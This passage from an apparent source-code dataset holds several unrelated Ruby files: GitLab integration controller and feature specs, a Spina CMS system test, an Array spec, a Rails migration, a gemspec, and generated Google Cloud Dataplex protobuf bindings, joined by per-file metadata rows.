'project_url' => 'https://buildkite.com/organization/pipeline'
}
end
before do
allow_any_instance_of(ServiceHook).to receive(:execute).and_return(true)
end
it 'persist the object' do
do_put
expect(response).to be_successful
expect(json_response).to be_empty
expect(Integrations::Buildkite.first).to be_present
end
it 'creates the ServiceHook object' do
do_put
expect(response).to be_successful
expect(json_response).to be_empty
expect(Integrations::Buildkite.first.service_hook).to be_present
end
def do_put
put :test, params: project_params(id: 'buildkite',
service: integration_params)
end
end
end
context 'when unsuccessful' do
it 'returns an error response when the integration test fails' do
stub_request(:get, 'http://example.com/rest/api/2/serverInfo')
.to_return(status: 404)
put :test, params: project_params(service: integration_params)
expect(response).to be_successful
expect(json_response).to eq(
'error' => true,
'message' => 'Connection failed. Please check your settings.',
'service_response' => '',
'test_failed' => true
)
end
context 'with the Slack integration' do
let_it_be(:integration) { build(:integrations_slack) }
it 'returns an error response when the URL is blocked' do
put :test, params: project_params(service: { webhook: 'http://127.0.0.1' })
expect(response).to be_successful
expect(json_response).to eq(
'error' => true,
'message' => 'Connection failed. Please check your settings.',
'service_response' => "URL 'http://127.0.0.1' is blocked: Requests to localhost are not allowed",
'test_failed' => true
)
end
it 'returns an error response when a network exception is raised' do
expect_next(Integrations::Slack).to receive(:test).and_raise(Errno::ECONNREFUSED)
put :test, params: project_params
expect(response).to be_successful
expect(json_response).to eq(
'error' => true,
'message' => 'Connection failed. Please check your settings.',
'service_response' => 'Connection refused',
'test_failed' => true
)
end
end
end
end
describe 'PUT #update' do
describe 'as HTML' do
let(:integration_params) { { active: true } }
let(:params) { project_params(service: integration_params) }
let(:message) { 'Jira settings saved and active.' }
let(:redirect_url) { edit_project_service_path(project, integration) }
before do
stub_jira_integration_test
put :update, params: params
end
shared_examples 'integration update' do
it 'redirects to the correct url with a flash message' do
expect(response).to redirect_to(redirect_url)
expect(flash[:notice]).to eq(message)
end
end
context 'when param `active` is set to true' do
let(:params) { project_params(service: integration_params, redirect_to: redirect) }
context 'when redirect_to param is present' do
let(:redirect) { '/redirect_here' }
let(:redirect_url) { redirect }
it_behaves_like 'integration update'
end
context 'when redirect_to is an external domain' do
let(:redirect) { 'http://examle.com' }
it_behaves_like 'integration update'
end
context 'when redirect_to param is an empty string' do
let(:redirect) { '' }
it_behaves_like 'integration update'
end
end
context 'when param `active` is set to false' do
let(:integration_params) { { active: false } }
let(:message) { 'Jira settings saved, but not active.' }
it_behaves_like 'integration update'
end
context 'when param `inherit_from_id` is set to empty string' do
let(:integration_params) { { inherit_from_id: '' } }
it 'sets inherit_from_id to nil' do
expect(integration.reload.inherit_from_id).to eq(nil)
end
end
context 'when param `inherit_from_id` is set to an instance integration' do
let(:instance_integration) { create(:jira_integration, :instance, url: 'http://instance.com', password: 'instance') }
let(:integration_params) { { inherit_from_id: instance_integration.id, url: 'http://custom.com', password: 'custom' } }
it 'ignores submitted params and inherits instance settings' do
expect(integration.reload).to have_attributes(
inherit_from_id: instance_integration.id,
url: instance_integration.url,
password: instance_integration.password
)
end
end
context 'when param `inherit_from_id` is set to a group integration' do
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:jira_integration) { create(:jira_integration, project: project) }
let(:group_integration) { create(:jira_integration, group: group, project: nil, url: 'http://group.com', password: 'group') }
let(:integration_params) { { inherit_from_id: group_integration.id, url: 'http://custom.com', password: 'custom' } }
it 'ignores submitted params and inherits group settings' do
expect(integration.reload).to have_attributes(
inherit_from_id: group_integration.id,
url: group_integration.url,
password: group_integration.password
)
end
end
context 'when param `inherit_from_id` is set to an unrelated group' do
let_it_be(:group) { create(:group) }
let(:group_integration) { create(:jira_integration, group: group, project: nil, url: 'http://group.com', password: 'group') }
let(:integration_params) { { inherit_from_id: group_integration.id, url: 'http://custom.com', password: 'custom' } }
it 'ignores the param and saves the submitted settings' do
expect(integration.reload).to have_attributes(
inherit_from_id: nil,
url: 'http://custom.com',
password: 'custom'
)
end
end
end
describe 'as JSON' do
before do
stub_jira_integration_test
put :update, params: project_params(service: integration_params, format: :json)
end
context 'when update succeeds' do
let(:integration_params) { { url: 'http://example.com', password: 'password' } }
it 'returns success response' do
expect(response).to be_successful
expect(json_response).to include(
'active' => true,
'errors' => {}
)
end
end
context 'when update fails with missing password' do
let(:integration_params) { { url: 'http://example.com' } }
it 'returns JSON response errors' do
expect(response).not_to be_successful
expect(json_response).to include(
'active' => true,
'errors' => {
'password' => ["can't be blank"]
}
)
end
end
context 'when update fails with invalid URL' do
let(:integration_params) { { url: '', password: 'password' } }
it 'returns JSON response with errors' do
expect(response).to have_gitlab_http_status(:unprocessable_entity)
expect(json_response).to include(
'active' => true,
'errors' => { 'url' => ['must be a valid URL', "can't be blank"] }
)
end
end
end
context 'with Prometheus integration' do
let_it_be(:prometheus_integration) { create(:prometheus_integration, project: project) }
let(:integration) { prometheus_integration }
let(:integration_params) { { manual_configuration: '1', api_url: 'http://example.com' } }
context 'when feature flag :settings_operations_prometheus_service is enabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: true)
end
it 'redirects user back to edit page with alert' do
put :update, params: project_params.merge(service: integration_params)
expect(response).to redirect_to(edit_project_service_path(project, integration))
expected_alert = [
"You can now manage your Prometheus settings on the",
%(<a href="#{project_settings_operations_path(project)}">Operations</a> page.),
"Fields on this page have been deprecated."
].join(' ')
expect(controller).to set_flash.now[:alert].to(expected_alert)
end
it 'does not modify integration' do
expect { put :update, params: project_params.merge(service: integration_params) }
.not_to change { project.prometheus_integration.reload.attributes }
end
end
context 'when feature flag :settings_operations_prometheus_service is disabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: false)
end
it 'modifies integration' do
expect { put :update, params: project_params.merge(service: integration_params) }
.to change { project.prometheus_integration.reload.attributes }
end
end
end
end
describe 'GET #edit' do
context 'with Jira service' do
let(:integration_param) { 'jira' }
before do
get :edit, params: project_params(id: integration_param)
end
context 'with approved services' do
it 'renders edit page' do
expect(response).to be_successful
end
end
end
context 'with Prometheus service' do
let(:integration_param) { 'prometheus' }
context 'when feature flag :settings_operations_prometheus_service is enabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: true)
get :edit, params: project_params(id: integration_param)
end
it 'renders deprecation warning notice' do
expected_alert = [
"You can now manage your Prometheus settings on the",
%(<a href="#{project_settings_operations_path(project)}">Operations</a> page.),
"Fields on this page have been deprecated."
].join(' ')
expect(controller).to set_flash.now[:alert].to(expected_alert)
end
end
context 'when feature flag :settings_operations_prometheus_service is disabled' do
before do
stub_feature_flags(settings_operations_prometheus_service: false)
get :edit, params: project_params(id: integration_param)
end
it 'does not render deprecation warning notice' do
expect(controller).not_to set_flash.now[:alert]
end
end
end
end
private
def project_params(opts = {})
opts.reverse_merge(
namespace_id: project.namespace,
project_id: project,
id: integration.to_param
)
end
end
| 33.322506 | 133 | 0.628464 |
e2993733ce1dd6e539b05ab3ba906585a49f78f8 | 1,079 | # frozen_string_literal: true
require 'application_system_test_case'
module Spina
module Admin
module Journal
class JournalsTest < ApplicationSystemTestCase
setup do
@journal = spina_admin_journal_journals :journal
authenticate
end
test 'updating the journal' do
visit edit_admin_journal_journal_path(@journal)
assert_selector '.breadcrumbs' do
assert_text @journal.name
end
fill_in 'journal_name', with: 'New journal name'
click_on 'Save journal'
assert_text 'Journal saved'
end
test 'destroying the journal' do
visit edit_admin_journal_journal_path(@journal)
accept_alert do
click_on 'Permanently delete'
end
# find '#overlay', visible: true, style: { display: 'block' }
# assert_text "Are you sure you want to delete the journal #{@journal.name}?"
# click_on 'Yes, I\'m sure'
assert_text 'Journal deleted'
end
end
end
end
end
| 28.394737 | 87 | 0.618165 |
183c5e45a41a7d8d6c4be8c7ac4ab49d4b1c0434 | 567 | require 'spec_helper'
describe Array do
describe '#indent' do
subject { ["root:", " indented:"] }
it "prepends each element with spaces" do
expect(subject.indent 2).to eq [" root:", " indented:"]
end
context "when offset is 0" do
it "returns the array as is" do
expect(subject.indent 0).to eq subject
end
end
end
describe '#nonuniq' do
subject { %w[one it it two works three works] }
it "returns an array of non unique elements" do
expect(subject.nonuniq).to eq %w[it works]
end
end
end
| 23.625 | 65 | 0.622575 |
e8e186cc37a7c1bf00780b04e4aba8650307ea6c | 178 | # frozen_string_literal: true
class AddSpecialToDomainTags < ActiveRecord::Migration[5.2]
def change
add_column :domain_tags, :special, :boolean, default: false
end
end
| 22.25 | 63 | 0.769663 |
e9acdc1d0824a6fb746ed1c397425f032e0e8f37 | 1,520 | # encoding: utf-8
$:.unshift File.expand_path('../lib', __FILE__)
require 'comfortable_mexican_sofa/version'
Gem::Specification.new do |s|
s.name = "comfortable_mexican_sofa"
s.version = ComfortableMexicanSofa::VERSION
s.authors = ["Oleg Khabarov"]
s.email = ["[email protected]"]
s.homepage = "http://github.com/comfy/comfortable-mexican-sofa"
s.summary = "Rails 4 CMS Engine"
s.description = "ComfortableMexicanSofa is a powerful Rails 4 CMS Engine"
s.license = 'MIT'
s.files = `git ls-files`.split("\n")
s.platform = Gem::Platform::RUBY
s.require_paths = ['lib']
s.required_ruby_version = '>= 1.9.3'
s.add_dependency 'rails', '>= 4.0.0', '< 5'
s.add_dependency 'rails-i18n', '>= 4.0.0'
s.add_dependency 'bootstrap_form', '>= 2.2.0'
s.add_dependency 'active_link_to', '>= 1.0.0'
s.add_dependency 'paperclip', '>= 4.0.0'
s.add_dependency 'kramdown', '>= 1.0.0'
s.add_dependency 'jquery-rails', '>= 3.0.0'
s.add_dependency 'jquery-ui-rails', '>= 5.0.0'
s.add_dependency 'haml-rails', '>= 0.3.0'
s.add_dependency 'sass-rails', '>= 4.0.3'
s.add_dependency 'coffee-rails', '>= 3.1.0'
s.add_dependency 'codemirror-rails', '>= 3.0.0'
s.add_dependency 'kaminari', '>= 0.14.0'
s.add_dependency 'tinymce-rails', '>= 4.0.0'
s.add_dependency 'bootstrap-sass', '>= 3.2.0'
s.add_dependency 'plupload-rails', '>= 1.2.1'
end
| 38.974359 | 77 | 0.597368 |
f8da1d67f2f839a83915272820d2092064dadccf | 12,472 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/dataplex/v1/metadata.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'
require 'google/protobuf/empty_pb'
require 'google/protobuf/timestamp_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/dataplex/v1/metadata.proto", :syntax => :proto3) do
add_message "google.cloud.dataplex.v1.CreateEntityRequest" do
optional :parent, :string, 1
optional :entity, :message, 3, "google.cloud.dataplex.v1.Entity"
optional :validate_only, :bool, 4
end
add_message "google.cloud.dataplex.v1.UpdateEntityRequest" do
optional :entity, :message, 2, "google.cloud.dataplex.v1.Entity"
optional :validate_only, :bool, 3
end
add_message "google.cloud.dataplex.v1.DeleteEntityRequest" do
optional :name, :string, 1
optional :etag, :string, 2
end
add_message "google.cloud.dataplex.v1.ListEntitiesRequest" do
optional :parent, :string, 1
optional :view, :enum, 2, "google.cloud.dataplex.v1.ListEntitiesRequest.EntityView"
optional :page_size, :int32, 3
optional :page_token, :string, 4
optional :filter, :string, 5
end
add_enum "google.cloud.dataplex.v1.ListEntitiesRequest.EntityView" do
value :ENTITY_VIEW_UNSPECIFIED, 0
value :TABLES, 1
value :FILESETS, 2
end
add_message "google.cloud.dataplex.v1.ListEntitiesResponse" do
repeated :entities, :message, 1, "google.cloud.dataplex.v1.Entity"
optional :next_page_token, :string, 2
end
add_message "google.cloud.dataplex.v1.GetEntityRequest" do
optional :name, :string, 1
optional :view, :enum, 2, "google.cloud.dataplex.v1.GetEntityRequest.EntityView"
end
add_enum "google.cloud.dataplex.v1.GetEntityRequest.EntityView" do
value :ENTITY_VIEW_UNSPECIFIED, 0
value :BASIC, 1
value :SCHEMA, 2
value :FULL, 4
end
add_message "google.cloud.dataplex.v1.ListPartitionsRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
optional :filter, :string, 4
end
add_message "google.cloud.dataplex.v1.CreatePartitionRequest" do
optional :parent, :string, 1
optional :partition, :message, 3, "google.cloud.dataplex.v1.Partition"
optional :validate_only, :bool, 4
end
add_message "google.cloud.dataplex.v1.DeletePartitionRequest" do
optional :name, :string, 1
optional :etag, :string, 2
end
add_message "google.cloud.dataplex.v1.ListPartitionsResponse" do
repeated :partitions, :message, 1, "google.cloud.dataplex.v1.Partition"
optional :next_page_token, :string, 2
end
add_message "google.cloud.dataplex.v1.GetPartitionRequest" do
optional :name, :string, 1
end
add_message "google.cloud.dataplex.v1.Entity" do
optional :name, :string, 1
optional :display_name, :string, 2
optional :description, :string, 3
optional :create_time, :message, 5, "google.protobuf.Timestamp"
optional :update_time, :message, 6, "google.protobuf.Timestamp"
optional :id, :string, 7
optional :etag, :string, 8
optional :type, :enum, 10, "google.cloud.dataplex.v1.Entity.Type"
optional :asset, :string, 11
optional :data_path, :string, 12
optional :data_path_pattern, :string, 13
optional :catalog_entry, :string, 14
optional :system, :enum, 15, "google.cloud.dataplex.v1.StorageSystem"
optional :format, :message, 16, "google.cloud.dataplex.v1.StorageFormat"
optional :compatibility, :message, 19, "google.cloud.dataplex.v1.Entity.CompatibilityStatus"
optional :schema, :message, 50, "google.cloud.dataplex.v1.Schema"
end
add_message "google.cloud.dataplex.v1.Entity.CompatibilityStatus" do
optional :hive_metastore, :message, 1, "google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility"
optional :bigquery, :message, 2, "google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility"
end
add_message "google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility" do
optional :compatible, :bool, 1
optional :reason, :string, 2
end
add_enum "google.cloud.dataplex.v1.Entity.Type" do
value :TYPE_UNSPECIFIED, 0
value :TABLE, 1
value :FILESET, 2
end
add_message "google.cloud.dataplex.v1.Partition" do
optional :name, :string, 1
repeated :values, :string, 2
optional :location, :string, 3
optional :etag, :string, 4
end
add_message "google.cloud.dataplex.v1.Schema" do
optional :user_managed, :bool, 1
repeated :fields, :message, 2, "google.cloud.dataplex.v1.Schema.SchemaField"
repeated :partition_fields, :message, 3, "google.cloud.dataplex.v1.Schema.PartitionField"
optional :partition_style, :enum, 4, "google.cloud.dataplex.v1.Schema.PartitionStyle"
end
add_message "google.cloud.dataplex.v1.Schema.SchemaField" do
optional :name, :string, 1
optional :description, :string, 2
optional :type, :enum, 3, "google.cloud.dataplex.v1.Schema.Type"
optional :mode, :enum, 4, "google.cloud.dataplex.v1.Schema.Mode"
repeated :fields, :message, 10, "google.cloud.dataplex.v1.Schema.SchemaField"
end
add_message "google.cloud.dataplex.v1.Schema.PartitionField" do
optional :name, :string, 1
optional :type, :enum, 2, "google.cloud.dataplex.v1.Schema.Type"
end
add_enum "google.cloud.dataplex.v1.Schema.Type" do
value :TYPE_UNSPECIFIED, 0
value :BOOLEAN, 1
value :BYTE, 2
value :INT16, 3
value :INT32, 4
value :INT64, 5
value :FLOAT, 6
value :DOUBLE, 7
value :DECIMAL, 8
value :STRING, 9
value :BINARY, 10
value :TIMESTAMP, 11
value :DATE, 12
value :TIME, 13
value :RECORD, 14
value :NULL, 100
end
add_enum "google.cloud.dataplex.v1.Schema.Mode" do
value :MODE_UNSPECIFIED, 0
value :REQUIRED, 1
value :NULLABLE, 2
value :REPEATED, 3
end
add_enum "google.cloud.dataplex.v1.Schema.PartitionStyle" do
value :PARTITION_STYLE_UNSPECIFIED, 0
value :HIVE_COMPATIBLE, 1
end
add_message "google.cloud.dataplex.v1.StorageFormat" do
optional :format, :enum, 1, "google.cloud.dataplex.v1.StorageFormat.Format"
optional :compression_format, :enum, 2, "google.cloud.dataplex.v1.StorageFormat.CompressionFormat"
optional :mime_type, :string, 3
oneof :options do
optional :csv, :message, 10, "google.cloud.dataplex.v1.StorageFormat.CsvOptions"
optional :json, :message, 11, "google.cloud.dataplex.v1.StorageFormat.JsonOptions"
end
end
add_message "google.cloud.dataplex.v1.StorageFormat.CsvOptions" do
optional :encoding, :string, 1
optional :header_rows, :int32, 2
optional :delimiter, :string, 3
optional :quote, :string, 4
end
add_message "google.cloud.dataplex.v1.StorageFormat.JsonOptions" do
optional :encoding, :string, 1
end
add_enum "google.cloud.dataplex.v1.StorageFormat.Format" do
value :FORMAT_UNSPECIFIED, 0
value :PARQUET, 1
value :AVRO, 2
value :ORC, 3
value :CSV, 100
value :JSON, 101
value :IMAGE, 200
value :AUDIO, 201
value :VIDEO, 202
value :TEXT, 203
value :TFRECORD, 204
value :OTHER, 1000
value :UNKNOWN, 1001
end
add_enum "google.cloud.dataplex.v1.StorageFormat.CompressionFormat" do
value :COMPRESSION_FORMAT_UNSPECIFIED, 0
value :GZIP, 2
value :BZIP2, 3
end
add_enum "google.cloud.dataplex.v1.StorageSystem" do
value :STORAGE_SYSTEM_UNSPECIFIED, 0
value :CLOUD_STORAGE, 1
value :BIGQUERY, 2
end
end
end
module Google
module Cloud
module Dataplex
module V1
CreateEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.CreateEntityRequest").msgclass
UpdateEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.UpdateEntityRequest").msgclass
DeleteEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.DeleteEntityRequest").msgclass
ListEntitiesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListEntitiesRequest").msgclass
ListEntitiesRequest::EntityView = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListEntitiesRequest.EntityView").enummodule
ListEntitiesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListEntitiesResponse").msgclass
GetEntityRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.GetEntityRequest").msgclass
GetEntityRequest::EntityView = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.GetEntityRequest.EntityView").enummodule
ListPartitionsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListPartitionsRequest").msgclass
CreatePartitionRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.CreatePartitionRequest").msgclass
DeletePartitionRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.DeletePartitionRequest").msgclass
ListPartitionsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.ListPartitionsResponse").msgclass
GetPartitionRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.GetPartitionRequest").msgclass
Entity = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity").msgclass
Entity::CompatibilityStatus = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity.CompatibilityStatus").msgclass
Entity::CompatibilityStatus::Compatibility = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity.CompatibilityStatus.Compatibility").msgclass
Entity::Type = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Entity.Type").enummodule
Partition = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Partition").msgclass
Schema = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema").msgclass
Schema::SchemaField = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.SchemaField").msgclass
Schema::PartitionField = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.PartitionField").msgclass
Schema::Type = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.Type").enummodule
Schema::Mode = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.Mode").enummodule
Schema::PartitionStyle = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.Schema.PartitionStyle").enummodule
StorageFormat = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat").msgclass
StorageFormat::CsvOptions = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.CsvOptions").msgclass
StorageFormat::JsonOptions = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.JsonOptions").msgclass
StorageFormat::Format = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.Format").enummodule
StorageFormat::CompressionFormat = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageFormat.CompressionFormat").enummodule
StorageSystem = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.dataplex.v1.StorageSystem").enummodule
end
end
end
end
| 51.53719 | 187 | 0.723942 |
08d0a73ec7eb055a0c1863d51d7bde9e8f7f3045 | 3,375 | module Stubby
mattr_accessor :base_definitions, :instance_definitions
@@base_definitions = {}
@@instance_definitions = {}
class << self
def included(base)
base.after :each do Stubby::Instances.clear! end
end
def base_definition(name)
name = name.name.demodulize if name.is_a? Class
@@base_definitions[name]
end
def instance_definitions(name)
@@instance_definitions[name] ||= {}
end
end
class Definition
cattr_accessor :directory
attr_reader :name, :class, :original_class, :base_class, :methods
attr_accessor :default_instance_key
def initialize(attributes = {})
attributes.each{|name, value| instance_variable_set :"@#{name}", value }
register
end
def register
if base_class == Stub
Stubby.base_definitions[key] = self
else
base_definition.default_instance_key ||= instance_key
Stubby.instance_definitions(base_key)[instance_key] = self
end
end
def name
@name ||= original_class.name if original_class
@name
end
def base_class
@base_class ||= Stub
end
def base_key
@base_key ||= base_class.name.demodulize
end
def base_definition
@base_definition ||= Stubby.base_definitions[base_key]
end
def instance_definitions
Stubby.instance_definitions(key)
end
def instance_definition(instance_key)
Stubby.instance_definitions(key)[instance_key]
end
def key
@key ||= name.to_s.classify.sub('::', '')
end
def instance_key
@instance_key ||= name.demodulize.underscore.to_sym
end
def original_class
@original_class ||= base_class.original_class if base_class
@original_class
end
def methods
@methods ||= {}
end
def create!(&block)
@class = ClassFactory.create(base_class, name, original_class, methods, &block)
end
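# Illustrative call sketch (the :admin instance key is hypothetical):
#   definition.instantiate          # memoized default instance for this definition
#   definition.instantiate(:admin)  # instance built from a registered instance definition
#   definition.instantiate(:all)    # one instance per registered instance definition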
def instantiate(key = nil)
if key == :all
instance_definitions.collect{|key, definition| definition.instantiate }
elsif key
key = default_instance_key if key == :first
instance_definition(key).instantiate
else
Instances.by_key(base_class)[instance_key] or
Instances.store(base_class, self.class.new, instance_key)
end
end
module Loader
class << self
def define(original_class, &block)
definition = Definition.new :original_class => original_class
definition.create! &block
end
def instance(klass, *args)
klass = Stubby.base_definition(klass).class
definition = Definition.new :base_class => klass,
:methods => args.extract_options!,
:name => args.shift.to_s.camelize
definition.create!
end
def load
unless @loaded
Dir["#{Stubby::Definition.directory}/**/*.rb"].each do |filename|
instance_eval IO.read(filename), filename
end
end
@loaded = true
end
end
end
end
end | 27 | 86 | 0.578667 |
912398725863ae843282fa115335662c473f6b0a | 2,830 | require 'readline'
require 'optparse'
require 'gitsh/completer'
require 'gitsh/environment'
require 'gitsh/history'
require 'gitsh/interpreter'
require 'gitsh/prompter'
require 'gitsh/version'
module Gitsh
class CLI
EX_OK = 0
EX_USAGE = 64
def initialize(opts={})
interpreter_factory = opts.fetch(:interpreter_factory, Interpreter)
@env = opts.fetch(:env, Environment.new)
@interpreter = interpreter_factory.new(@env)
@readline = ReadlineBlankFilter.new(opts.fetch(:readline, Readline))
@unparsed_args = opts.fetch(:args, ARGV).clone
@history = opts.fetch(:history, History.new(@env, @readline))
end
def run
parse_arguments
if unparsed_args.any?
exit_with_usage_message
else
run_interactive
end
end
private
attr_reader :env, :readline, :unparsed_args, :interpreter, :history
def run_interactive
history.load
setup_readline
greet_user
interactive_loop
ensure
history.save
end
def setup_readline
readline.completion_append_character = nil
readline.completion_proc = Completer.new(readline, env)
end
def interactive_loop
while command = read_command
interpreter.execute(command)
end
env.print "\n"
rescue Interrupt
env.print "\n"
retry
end
def read_command
command = readline.readline(prompt, true)
if command && command.empty?
env.fetch('gitsh.defaultCommand', 'status')
else
command
end
end
def prompt
prompter.prompt
end
def prompter
@prompter ||= Prompter.new(env: env, color: color_support?)
end
def color_support?
output, error, exit_status = Open3.capture3('tput colors')
exit_status.success? && output.chomp.to_i > 0
end
def exit_with_usage_message
env.puts_error option_parser.banner
exit EX_USAGE
end
def parse_arguments
option_parser.parse!(unparsed_args)
rescue OptionParser::InvalidOption => err
unparsed_args.concat(err.args)
end
def option_parser
OptionParser.new do |opts|
opts.banner = 'usage: gitsh [--version] [-h | --help] [--git PATH]'
opts.on('--git [COMMAND]', 'Use the specified git command') do |git_command|
env.git_command = git_command
end
opts.on_tail('--version', 'Display the version and exit') do
env.puts VERSION
exit EX_OK
end
opts.on_tail('--help', '-h', 'Display this help message and exit') do
env.puts opts
exit EX_OK
end
end
end
def greet_user
unless env['gitsh.noGreeting'] == 'true'
env.puts "gitsh #{Gitsh::VERSION}\nType :exit to exit"
end
end
end
end
| 23.196721 | 84 | 0.636042 |
4a8db82cf33732624cf9e38320675fd588f3486b | 576 | require 'digest/sha1'
# @summary
# Hash a string as mysql's "PASSWORD()" function would do it
#
Puppet::Functions.create_function(:'mysql::password') do
# @param password
# Plain text password.
#
# @return hash
# The mysql password hash from the clear text password.
#
dispatch :password do
required_param 'String', :password
return_type 'String'
end
def password(password)
return '' if password.empty?
return password if password =~ %r{\*[A-F0-9]{40}$}
'*' + Digest::SHA1.hexdigest(Digest::SHA1.digest(password)).upcase
end
end
| 25.043478 | 70 | 0.675347 |
1c1e9a26ab02decf7d0b80646cbfde80e6023af8 | 2,939 | # frozen_string_literal: true
class Fisk
module Instructions
# Instruction PUNPCKHWD
forms = []
operands = []
encodings = []
# punpckhwd: mm, mm
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[36]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# punpckhwd: mm, m64
operands << OPERAND_TYPES[54]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# punpckhwd: xmm, xmm
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
0,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# punpckhwd: xmm, m128
operands << OPERAND_TYPES[23]
operands << OPERAND_TYPES[25]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_prefix buffer, operands, 0x66, true
add_rex(buffer, operands,
false,
0,
operands[0].rex_value,
operands[1].rex_value,
operands[1].rex_value)
add_opcode buffer, 0x0F, 0
add_opcode buffer, 0x69, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 3; end
}.new
forms << Form.new(operands, encodings)
PUNPCKHWD = Instruction.new("PUNPCKHWD", forms)
end
end
| 27.212963 | 51 | 0.541681 |
e277f67b6272ad91bf3c0dc1c952556ba9efcf93 | 1,389 | # Called within a class definition, establishes a containment
# relationship with another class
Puppet::Parser::Functions::newfunction(
:contain,
:arity => -2,
:doc => "Contain one or more classes inside the current class. If any of
these classes are undeclared, they will be declared as if called with the
`include` function. Accepts a class name, an array of class names, or a
comma-separated list of class names.
A contained class will not be applied before the containing class is
begun, and will be finished before the containing class is finished.
You must use the class's full name;
relative names are not allowed. In addition to names in string form,
you may also directly use Class and Resource Type values that are produced by
evaluating resource and relationship expressions.
The function returns an array of references to the classes that were contained, thus
allowing the function call to `contain` to directly continue.
- Since 4.0.0 support for Class and Resource Type values, absolute names
- Since 4.7.0 an Array[Type[Class[n]]] is returned with all the contained classes
"
) do |classes|
# Call the 4.x version of this function in case 3.x ruby code uses this function
Puppet.warn_once(:deprecation, '3xfunction#contain', "Calling function_contain via the Scope class is deprecated. Use Scope#call_function instead")
call_function('contain', classes)
end
| 44.806452 | 149 | 0.781857 |
f86a1b8a0a4de59f3a1b5deb292c283c633a0f84 | 733 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'User activates JetBrains TeamCity CI' do
include_context 'project integration activation'
before do
stub_request(:post, /.*teamcity.example.com.*/)
end
it 'activates integration', :js do
visit_project_integration('JetBrains TeamCity')
check('Push')
check('Merge request')
fill_in('TeamCity server URL', with: 'http://teamcity.example.com')
fill_in('Build type', with: 'GitlabTest_Build')
